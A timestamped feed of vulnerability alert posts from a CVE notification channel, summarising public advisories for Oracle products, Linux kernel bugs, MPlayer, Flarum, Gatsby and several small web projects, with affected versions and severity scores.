🚨 CVE-2023-21843Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Sound). Supported versions that are affected are Oracle Java SE: 8u351, 8u351-perf, 11.0.17, 17.0.5, 19.0.1; Oracle GraalVM Enterprise Edition: 20.3.8, 21.3.4 and 22.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-01-18 02:29:49 |
🚨 CVE-2023-21849Vulnerability in the Oracle Applications DBA product of Oracle E-Business Suite (component: Java utils). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications DBA. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Applications DBA accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).🎖@cveNotify |
|
| 2023-01-18 02:29:45 |
🚨 CVE-2023-21841Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2023-01-18 02:29:44 |
🚨 CVE-2023-21850Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Demantra Demand Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).🎖@cveNotify |
|
| 2023-01-18 02:29:43 |
🚨 CVE-2023-21846Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Security). Supported versions that are affected are 5.9.0.0.0, 6.4.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise Oracle BI Publisher. Successful attacks of this vulnerability can result in takeover of Oracle BI Publisher. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-01-18 02:29:42 |
🚨 CVE-2023-21891Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Visual Analyzer). Supported versions that are affected are 5.9.0.0.0 and 6.4.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-01-18 02:29:38 |
🚨 CVE-2023-21848Vulnerability in the Oracle Communications Convergence product of Oracle Communications Applications (component: Admin Configuration). The supported version that is affected is 3.0.3.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Communications Convergence. Successful attacks of this vulnerability can result in takeover of Oracle Communications Convergence. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-01-18 02:29:37 |
🚨 CVE-2023-21857Vulnerability in the Oracle HCM Common Architecture product of Oracle E-Business Suite (component: Auomated Test Suite). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HCM Common Architecture. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle HCM Common Architecture accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).🎖@cveNotify |
|
| 2023-01-18 02:29:36 |
🚨 CVE-2023-21852Vulnerability in the Oracle Learning Management product of Oracle E-Business Suite (component: Setup). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Learning Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Learning Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).🎖@cveNotify |
|
| 2023-01-18 02:29:35 |
🚨 CVE-2023-21894Vulnerability in the Oracle Global Lifecycle Management NextGen OUI Framework product of Oracle Fusion Middleware (component: NextGen Installer issues). Supported versions that are affected are Prior to 13.9.4.2.11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Global Lifecycle Management NextGen OUI Framework executes to compromise Oracle Global Lifecycle Management NextGen OUI Framework. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Global Lifecycle Management NextGen OUI Framework. CVSS 3.1 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-01-18 00:30:24 |
🚨 CVE-2012-6703Integer overflow in the snd_compr_allocate_buffer function in sound/core/compress_offload.c in the ALSA subsystem in the Linux kernel before 3.6-rc6-next-20120917 allows local users to cause a denial of service (insufficient memory allocation) or possibly have unspecified other impact via a crafted SNDRV_COMPRESS_SET_PARAMS ioctl call.🎖@cveNotify |
|
| 2023-01-18 00:30:23 |
🚨 CVE-2012-6704The sock_setsockopt function in net/core/sock.c in the Linux kernel before 3.5 mishandles negative values of sk_sndbuf and sk_rcvbuf, which allows local users to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact by leveraging the CAP_NET_ADMIN capability for a crafted setsockopt system call with the (1) SO_SNDBUF or (2) SO_RCVBUF option.🎖@cveNotify |
|
| 2023-01-18 00:30:21 |
🚨 CVE-2013-4247Off-by-one error in the build_unc_path_to_root function in fs/cifs/connect.c in the Linux kernel before 3.9.6 allows remote attackers to cause a denial of service (memory corruption and system crash) via a DFS share mount operation that triggers use of an unexpected DFS referral name length.🎖@cveNotify |
|
| 2023-01-18 00:30:20 |
🚨 CVE-2013-1059net/ceph/auth_none.c in the Linux kernel through 3.10 allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via an auth_reply message that triggers an attempted build_request operation.🎖@cveNotify |
|
| 2023-01-18 00:30:19 |
🚨 CVE-2014-7145The SMB2_tcon function in fs/cifs/smb2pdu.c in the Linux kernel before 3.16.3 allows remote CIFS servers to cause a denial of service (NULL pointer dereference and client system crash) or possibly have unspecified other impact by deleting the IPC$ share during resolution of DFS referrals.🎖@cveNotify |
|
| 2023-01-18 00:30:17 |
🚨 CVE-2014-6416Buffer overflow in net/ceph/auth_x.c in Ceph, as used in the Linux kernel before 3.16.3, allows remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a long unencrypted auth ticket.🎖@cveNotify |
|
| 2023-01-18 00:30:16 |
🚨 CVE-2014-9904The snd_compress_check_input function in sound/core/compress_offload.c in the ALSA subsystem in the Linux kernel before 3.17 does not properly check for an integer overflow, which allows local users to cause a denial of service (insufficient memory allocation) or possibly have unspecified other impact via a crafted SNDRV_COMPRESS_SET_PARAMS ioctl call.🎖@cveNotify |
|
| 2023-01-18 00:30:15 |
🚨 CVE-2015-3288mm/memory.c in the Linux kernel before 4.1.4 mishandles anonymous pages, which allows local users to gain privileges or cause a denial of service (page tainting) via a crafted application that triggers writing to page zero.🎖@cveNotify |
|
| 2023-01-18 00:30:13 |
🚨 CVE-2016-4565The InfiniBand (aka IB) stack in the Linux kernel before 4.5.3 incorrectly relies on the write system call, which allows local users to cause a denial of service (kernel memory write operation) or possibly have unspecified other impact via a uAPI interface.🎖@cveNotify |
|
| 2023-01-18 00:30:12 |
🚨 CVE-2014-9914Race condition in the ip4_datagram_release_cb function in net/ipv4/datagram.c in the Linux kernel before 3.15.2 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging incorrect expectations about locking during multithreaded access to internal data structures for IPv4 UDP sockets.🎖@cveNotify |
|
| 2023-01-18 00:30:10 |
🚨 CVE-2016-4557The replace_map_fd_with_map_ptr function in kernel/bpf/verifier.c in the Linux kernel before 4.5.5 does not properly maintain an fd data structure, which allows local users to gain privileges or cause a denial of service (use-after-free) via crafted BPF instructions that reference an incorrect file descriptor.🎖@cveNotify |
|
| 2023-01-18 00:30:09 |
🚨 CVE-2016-4440arch/x86/kvm/vmx.c in the Linux kernel through 4.6.3 mishandles the APICv on/off state, which allows guest OS users to obtain direct APIC MSR access on the host OS, and consequently cause a denial of service (host OS crash) or possibly execute arbitrary code on the host OS, via x2APIC mode.🎖@cveNotify |
|
| 2023-01-18 00:30:08 |
🚨 CVE-2016-3135Integer overflow in the xt_alloc_table_info function in net/netfilter/x_tables.c in the Linux kernel through 4.5.2 on 32-bit platforms allows local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call.🎖@cveNotify |
|
| 2023-01-18 00:30:06 |
🚨 CVE-2016-2070The tcp_cwnd_reduction function in net/ipv4/tcp_input.c in the Linux kernel before 4.3.5 allows remote attackers to cause a denial of service (divide-by-zero error and system crash) via crafted TCP traffic.🎖@cveNotify |
|
| 2023-01-18 00:30:05 |
🚨 CVE-2016-1583The ecryptfs_privileged_open function in fs/ecryptfs/kthread.c in the Linux kernel before 4.6.3 allows local users to gain privileges or cause a denial of service (stack memory consumption) via vectors involving crafted mmap calls for /proc pathnames, leading to recursive pagefault handling.🎖@cveNotify |
|
| 2023-01-18 00:30:03 |
🚨 CVE-2016-0728The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.🎖@cveNotify |
|
| 2023-01-18 00:30:02 |
🚨 CVE-2016-10044The aio_mount function in fs/aio.c in the Linux kernel before 4.7.7 does not properly restrict execute access, which makes it easier for local users to bypass intended SELinux W^X policy restrictions, and consequently gain privileges, via an io_setup system call.🎖@cveNotify |
|
| 2023-01-18 00:30:00 |
🚨 CVE-2016-0758Integer overflow in lib/asn1_decoder.c in the Linux kernel before 4.6 allows local users to gain privileges via crafted ASN.1 data.🎖@cveNotify |
|
| 2023-01-18 00:29:59 |
🚨 CVE-2016-4568drivers/media/v4l2-core/videobuf2-v4l2.c in the Linux kernel before 4.5.3 allows local users to cause a denial of service (kernel memory write operation) or possibly have unspecified other impact via a crafted number of planes in a VIDIOC_DQBUF ioctl call.🎖@cveNotify |
|
| 2023-01-18 00:29:58 |
🚨 CVE-2016-7039The IP stack in the Linux kernel through 4.8.2 allows remote attackers to cause a denial of service (stack consumption and panic) or possibly have unspecified other impact by triggering use of the GRO path for large crafted packets, as demonstrated by packets that contain only VLAN headers, a related issue to CVE-2016-8666.🎖@cveNotify |
|
| 2023-01-17 21:30:01 |
🚨 CVE-2023-23749The 'LDAP Integration with Active Directory and OpenLDAP - NTLM & Kerberos Login' extension is vulnerable to LDAP Injection since is not properly sanitizing the 'username' POST parameter. An attacker can manipulate this paramter to dump arbitrary contents form the LDAP Database.🎖@cveNotify |
|
| 2023-01-17 21:30:00 |
🚨 CVE-2006-20001A carefully crafted If: request header can cause a memory read, or write of a single zero byte, in a pool (heap) memory location beyond the header value sent. This could cause the process to crash. This issue affects Apache HTTP Server 2.4.54 and earlier.🎖@cveNotify |
|
| 2023-01-17 21:29:58 |
🚨 CVE-2022-23548Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 2.9.0.beta16 on the `beta` and `tests-passed` branches, parsing posts can be susceptible to regular expression denial of service (ReDoS) attacks. This issue is patched in versions 2.8.14 and 2.9.0.beta16. There are no known workarounds.🎖@cveNotify |
|
| 2023-01-17 21:29:57 |
🚨 CVE-2023-21525Remote Procedure Call Runtime Denial of Service Vulnerability.🎖@cveNotify |
|
| 2023-01-17 21:29:56 |
🚨 CVE-2022-38850The MPlayer Project mencoder SVN-r38374-13.0.1 is vulnerable to Divide By Zero via the function config () of llibmpcodecs/vf_scale.c.🎖@cveNotify |
|
| 2023-01-17 21:29:55 |
🚨 CVE-2022-38851Certain The MPlayer Project products are vulnerable to Out-of-bounds Read via function read_meta_record() of mplayer/libmpdemux/asfheader.c. This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2023-01-17 21:29:54 |
🚨 CVE-2022-38865Certain The MPlayer Project products are vulnerable to Divide By Zero via the function demux_avi_read_packet of libmpdemux/demux_avi.c. This affects mplyer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2023-01-17 21:29:53 |
🚨 CVE-2022-38866Certain The MPlayer Project products are vulnerable to Buffer Overflow via read_avi_header() of libmpdemux/aviheader.c . This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2023-01-17 21:29:52 |
🚨 CVE-2022-38863Certain The MPlayer Project products are vulnerable to Buffer Overflow via function mp_getbits() of libmpdemux/mpeg_hdr.c which affects mencoder and mplayer. This affects mecoder SVN-r38374-13.0.1 and mplayer SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2023-01-17 21:29:51 |
🚨 CVE-2022-38858Certain The MPlayer Project products are vulnerable to Buffer Overflow via function mov_build_index() of libmpdemux/demux_mov.c. This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2023-01-17 21:29:50 |
🚨 CVE-2022-38861The MPlayer Project mplayer SVN-r38374-13.0.1 is vulnerable to memory corruption via function free_mp_image() of libmpcodecs/mp_image.c.🎖@cveNotify |
|
| 2023-01-17 21:29:49 |
🚨 CVE-2022-38864Certain The MPlayer Project products are vulnerable to Buffer Overflow via the function mp_unescape03() of libmpdemux/mpeg_hdr.c. This affects mencoder SVN-r38374-13.0.1 and mplayer SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2023-01-17 21:29:48 |
🚨 CVE-2022-38855Certain The MPlayer Project products are vulnerable to Buffer Overflow via function gen_sh_video () of mplayer/libmpdemux/demux_mov.c. This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2023-01-17 21:29:47 |
🚨 CVE-2022-38860Certain The MPlayer Project products are vulnerable to Divide By Zero via function demux_open_avi() of libmpdemux/demux_avi.c which affects mencoder. This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.🎖@cveNotify |
|
| 2023-01-17 21:29:46 |
🚨 CVE-2023-21524Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-17 21:29:45 |
🚨 CVE-2023-21527Windows iSCSI Service Denial of Service Vulnerability.🎖@cveNotify |
|
| 2023-01-17 21:29:44 |
🚨 CVE-2015-10064A vulnerability was found in VictorFerraresi pokemon-database-php. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection. The name of the patch is dd0e1e6cdf648d6a3deff441f515bcb1d7573d68. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218455.🎖@cveNotify |
|
| 2023-01-17 21:29:43 |
🚨 CVE-2022-23739An incorrect authorization vulnerability was identified in GitHub Enterprise Server, allowing for escalation of privileges in GraphQL API requests from GitHub Apps. This vulnerability allowed an app installed on an organization to gain access to and modify most organization-level resources that are not tied to a repository regardless of granted permissions, such as users and organization-wide projects. Resources associated with repositories were not impacted, such as repository file content, repository-specific projects, issues, or pull requests. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.7.1 and was fixed in versions 3.3.16, 3.4.11, 3.5.8, 3.6.4, 3.7.1. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2023-01-17 21:29:41 |
🚨 CVE-2023-22875IBM QRadar SIEM 7.4 and 7.5copies certificate key files used for SSL/TLS in the QRadar web user interface to managed hosts in the deployment that do not require that key. IBM X-Force ID: 244356.🎖@cveNotify |
|
| 2023-01-17 21:29:40 |
🚨 CVE-2015-10062A vulnerability, which was classified as problematic, was found in galaxy-data-resource up to 14.10.0. This affects an unknown part of the component Command Line Template. The manipulation leads to injection. Upgrading to version 14.10.1 is able to address this issue. The name of the patch is 50d65f45d3f5be5d1fbff2e45ac5cec075f07d42. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-218451.🎖@cveNotify |
|
| 2023-01-17 19:30:03 |
🚨 CVE-2022-2893RONDS EPM version 1.19.5 does not properly validate the filename parameter, which could allow an unauthorized user to specify file paths and download files.🎖@cveNotify |
|
| 2023-01-17 19:30:02 |
🚨 CVE-2022-3091RONDS EPM version 1.19.5 has a vulnerability in which a function could allow unauthenticated users to leak credentials. In some circumstances, an attacker can exploit this vulnerability to execute operating system (OS) commands.🎖@cveNotify |
|
| 2023-01-17 19:30:01 |
🚨 CVE-2022-4621Panasonic Sanyo CCTV Network Cameras versions 1.02-05 and 2.03-0x are vulnerable to CSRFs that can be exploited to allow an attacker to perform changes with administrator level privileges.🎖@cveNotify |
|
| 2023-01-17 19:30:00 |
🚨 CVE-2023-0158NLnet Labs Krill supports direct access to the RRDP repository content through its built-in web server at the "/rrdp" endpoint. Prior to 0.12.1 a direct query for any existing directory under "/rrdp/", rather than an RRDP file such as "/rrdp/notification.xml" as would be expected, causes Krill to crash. If the built-in "/rrdp" endpoint is exposed directly to the internet, then malicious remote parties can cause the publication server to crash. The repository content is not affected by this, but the availability of the server and repository can cause issues if this attack is persistent and is not mitigated.🎖@cveNotify |
|
| 2023-01-17 19:29:59 |
🚨 CVE-2018-14628An information leak vulnerability was discovered in Samba's LDAP server. Due to missing access control checks, an authenticated but unprivileged attacker could discover the names and preserved attributes of deleted objects in the LDAP store.🎖@cveNotify |
|
| 2023-01-17 19:29:57 |
🚨 CVE-2022-41858A flaw was found in the Linux kernel. A NULL pointer dereference may occur while a slip driver is in progress to detach in sl_tx_timeout in drivers/net/slip/slip.c. This issue could allow an attacker to crash the system or leak internal kernel information.🎖@cveNotify |
|
| 2023-01-17 19:29:56 |
🚨 CVE-2022-41859In freeradius, the EAP-PWD function compute_password_element() leaks information about the password which allows an attacker to substantially reduce the size of an offline dictionary attack.🎖@cveNotify |
|
| 2023-01-17 19:29:55 |
🚨 CVE-2022-41860In freeradius, when an EAP-SIM supplicant sends an unknown SIM option, the server will try to look that option up in the internal dictionaries. This lookup will fail, but the SIM code will not check for that failure. Instead, it will dereference a NULL pointer, and cause the server to crash.🎖@cveNotify |
|
| 2023-01-17 19:29:51 |
🚨 CVE-2022-41861A flaw was found in freeradius. A malicious RADIUS client or home server can send a malformed abinary attribute which can cause the server to crash.🎖@cveNotify |
|
| 2023-01-17 19:29:50 |
🚨 CVE-2022-4121In libetpan a null pointer dereference in mailimap_mailbox_data_status_free in low-level/imap/mailimap_types.c was found that could lead to a remote denial of service or other potential consequences.🎖@cveNotify |
|
| 2023-01-17 19:29:49 |
🚨 CVE-2013-10013A vulnerability was found in Bricco Authenticator Plugin. It has been declared as critical. This vulnerability affects the function authenticate/compare of the file src/java/talentum/escenic/plugins/authenticator/authenticators/DBAuthenticator.java. The manipulation leads to sql injection. Upgrading to version 1.39 is able to address this issue. The name of the patch is a5456633ff75e8f13705974c7ed1ce77f3f142d5. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218428.🎖@cveNotify |
|
| 2023-01-17 19:29:48 |
🚨 CVE-2015-10061A vulnerability was found in evandro-machado Trabalho-Web2. It has been classified as critical. This affects an unknown part of the file src/java/br/com/magazine/dao/ClienteDAO.java. The manipulation leads to sql injection. The name of the patch is f59ac954625d0a4f6d34f069a2e26686a7a20aeb. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218427.🎖@cveNotify |
|
| 2023-01-17 19:29:47 |
🚨 CVE-2016-15021A vulnerability was found in nickzren alsdb. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. Upgrading to version v2 is able to address this issue. The name of the patch is cbc79a68145e845f951113d184b4de207c341599. It is recommended to upgrade the affected component. The identifier VDB-218429 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-17 19:29:46 |
🚨 CVE-2023-0337Cross-site Scripting (XSS) - Reflected in GitHub repository lirantal/daloradius prior to master-branch.🎖@cveNotify |
|
| 2023-01-17 19:29:45 |
🚨 CVE-2023-0338Cross-site Scripting (XSS) - Reflected in GitHub repository lirantal/daloradius prior to master-branch.🎖@cveNotify |
|
| 2023-01-17 19:29:43 |
🚨 CVE-2017-20170A vulnerability was found in ollpu parontalli. It has been classified as critical. Affected is an unknown function of the file httpdocs/index.php. The manipulation of the argument s leads to sql injection. The name of the patch is 6891bb2dec57dca6daabc15a6d2808c8896620e5. It is recommended to apply a patch to fix this issue. VDB-218418 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-17 19:29:42 |
🚨 CVE-2022-42227jsonlint 1.0 is vulnerable to heap-buffer-overflow via /home/hjsz/jsonlint/src/lexer.🎖@cveNotify |
|
| 2023-01-17 19:29:41 |
🚨 CVE-2020-28975** DISPUTED ** svm_predict_values in svm.cpp in Libsvm v324, as used in scikit-learn 0.23.2 and other products, allows attackers to cause a denial of service (segmentation fault) via a crafted model SVM (introduced via pickle, json, or any other model permanence standard) with a large value in the _n_support array. NOTE: the scikit-learn vendor's position is that the behavior can only occur if the library's API is violated by an application that changes a private attribute.🎖@cveNotify |
|
| 2023-01-17 18:30:04 |
🚨 CVE-2013-10013A vulnerability was found in Bricco Authenticator Plugin. It has been declared as critical. This vulnerability affects the function authenticate/compare of the file src/java/talentum/escenic/plugins/authenticator/authenticators/DBAuthenticator.java. The manipulation leads to sql injection. Upgrading to version 1.39 is able to address this issue. The name of the patch is a5456633ff75e8f13705974c7ed1ce77f3f142d5. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218428.🎖@cveNotify |
|
| 2023-01-17 18:30:03 |
🚨 CVE-2016-15021A vulnerability was found in nickzren alsdb. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. Upgrading to version v2 is able to address this issue. The name of the patch is cbc79a68145e845f951113d184b4de207c341599. It is recommended to upgrade the affected component. The identifier VDB-218429 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-17 18:29:59 |
🚨 CVE-2023-0337Cross-site Scripting (XSS) - Reflected in GitHub repository lirantal/daloradius prior to master-branch.🎖@cveNotify |
|
| 2023-01-17 18:29:58 |
🚨 CVE-2022-22809A CWE-306: Missing Authentication for Critical Function vulnerability exists that could allow modifications of the touch configurations in an unauthorized manner when an attacker attempts to modify the touch configurations. Affected Product: spaceLYnk (V2.6.2 and prior), Wiser for KNX (formerly homeLYnk) (V2.6.2 and prior), fellerLYnk (V2.6.2 and prior)🎖@cveNotify |
|
| 2023-01-17 18:29:57 |
🚨 CVE-2022-22807A CWE-1021 Improper Restriction of Rendered UI Layers or Frames vulnerability exists that could cause unintended modifications of the product settings or user accounts when deceiving the user to use the web interface rendered within iframes. Affected Product: EcoStruxure EV Charging Expert (formerly known as EVlink Load Management System): (HMIBSCEA53D1EDB, HMIBSCEA53D1EDS, HMIBSCEA53D1EDM, HMIBSCEA53D1EDL, HMIBSCEA53D1ESS, HMIBSCEA53D1ESM, HMIBSCEA53D1EML) (All Versions prior to SP8 (Version 01) V4.0.0.13)🎖@cveNotify |
|
| 2023-01-17 18:29:56 |
🚨 CVE-2021-3942Certain HP Print products and Digital Sending products may be vulnerable to potential remote code execution and buffer overflow with use of Link-Local Multicast Name Resolution or LLMNR.🎖@cveNotify |
|
| 2023-01-17 16:30:16 |
🚨 CVE-2017-20170A vulnerability was found in ollpu parontalli. It has been classified as critical. Affected is an unknown function of the file httpdocs/index.php. The manipulation of the argument s leads to sql injection. The name of the patch is 6891bb2dec57dca6daabc15a6d2808c8896620e5. It is recommended to apply a patch to fix this issue. VDB-218418 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-17 16:30:15 |
🚨 CVE-2022-4636Black Box KVM Firmware version 3.4.31307 on models ACR1000A-R-R2, ACR1000A-T-R2, ACR1002A-T, ACR1002A-R, and ACR1020A-T is vulnerable to path traversal, which may allow an attacker to steal user credentials and other sensitive information through local file inclusion.🎖@cveNotify |
|
| 2023-01-17 16:30:14 |
🚨 CVE-2015-10042** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical was found in Dovgalyuk AIBattle. Affected by this vulnerability is the function registerUser of the file site/procedures.php. The manipulation of the argument postLogin leads to sql injection. The name of the patch is 448e9880aac18ae7832f8d065e03e46ce0f1d3e3. It is recommended to apply a patch to fix this issue. The identifier VDB-218305 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-17 16:30:13 |
🚨 CVE-2017-20169A vulnerability, which was classified as critical, has been found in GGGGGGGG ToN-MasterServer. Affected by this issue is some unknown functionality of the file public_html/irc_updater/svr_request_pub.php. The manipulation leads to sql injection. The name of the patch is 3a4c7e6d51bf95760820e3245e06c6e321a7168a. It is recommended to apply a patch to fix this issue. VDB-218306 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-17 16:30:12 |
🚨 CVE-2021-36204Under some circumstances an Insufficiently Protected Credentials vulnerability in Johnson Controls Metasys ADS/ADX/OAS 10 versions prior to 10.1.6 and 11 versions prior to 11.0.3 allows API calls to expose credentials in plain text.🎖@cveNotify |
|
| 2023-01-17 16:30:08 |
🚨 CVE-2022-45299An issue in the IpFile argument of rust-lang webbrowser-rs v0.8.2 allows attackers to access arbitrary files via supplying a crafted URL.🎖@cveNotify |
|
| 2023-01-17 16:30:07 |
🚨 CVE-2023-21594Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-01-17 16:30:06 |
🚨 CVE-2022-48091Tramyardg hotel-mgmt-system version 2022.4 is vulnerable to Cross Site Scripting (XSS) via process_update_profile.php.🎖@cveNotify |
|
| 2023-01-17 16:30:02 |
🚨 CVE-2023-22489Flarum is a discussion platform for websites. If the first post of a discussion is permanently deleted but the discussion stays visible, any actor who can view the discussion is able to create a new reply via the REST API, no matter the reply permission or lock status. This includes users that don't have a validated email. Guests cannot successfully create a reply because the API will fail with a 500 error when the user ID 0 is inserted into the database. This happens because when the first post of a discussion is permanently deleted, the `first_post_id` attribute of the discussion becomes `null` which causes access control to be skipped for all new replies. Flarum automatically makes discussions with zero comments invisible so an additional condition for this vulnerability is that the discussion must have at least one approved reply so that `discussions.comment_count` is still above zero after the post deletion. This can open the discussion to uncontrolled spam or just unintentional replies if users still had their tab open before the vulnerable discussion was locked and then post a reply when they shouldn't be able to. In combination with the email notification settings, this could also be used as a way to send unsolicited emails. Versions between `v1.3.0` and `v1.6.3` are impacted. The vulnerability has been fixed and published as flarum/core v1.6.3. All communities running Flarum should upgrade as soon as possible. There are no known workarounds.🎖@cveNotify |
|
| 2023-01-17 16:30:01 |
🚨 CVE-2023-22491Gatsby is a free and open source framework based on React that helps developers build websites and apps. The gatsby-transformer-remark plugin prior to versions 5.25.1 and 6.3.2 passes input through to the `gray-matter` npm package, which is vulnerable to JavaScript injection in its default configuration, unless input is sanitized. The vulnerability is present in gatsby-transformer-remark when passing input in data mode (querying MarkdownRemark nodes via GraphQL). Injected JavaScript executes in the context of the build server. To exploit this vulnerability untrusted/unsanitized input would need to be sourced by or added into a file processed by gatsby-transformer-remark. A patch has been introduced in `gatsby-transformer-remark@5.25.1` and `gatsby-transformer-remark@6.3.2` which mitigates the issue by disabling the `gray-matter` JavaScript Frontmatter engine. As a workaround, if an older version of `gatsby-transformer-remark` must be used, input passed into the plugin should be sanitized ahead of processing. It is encouraged for projects to upgrade to the latest major release branch for all Gatsby plugins to ensure the latest security updates and bug fixes are received in a timely manner.🎖@cveNotify |
|
| 2023-01-17 16:30:00 |
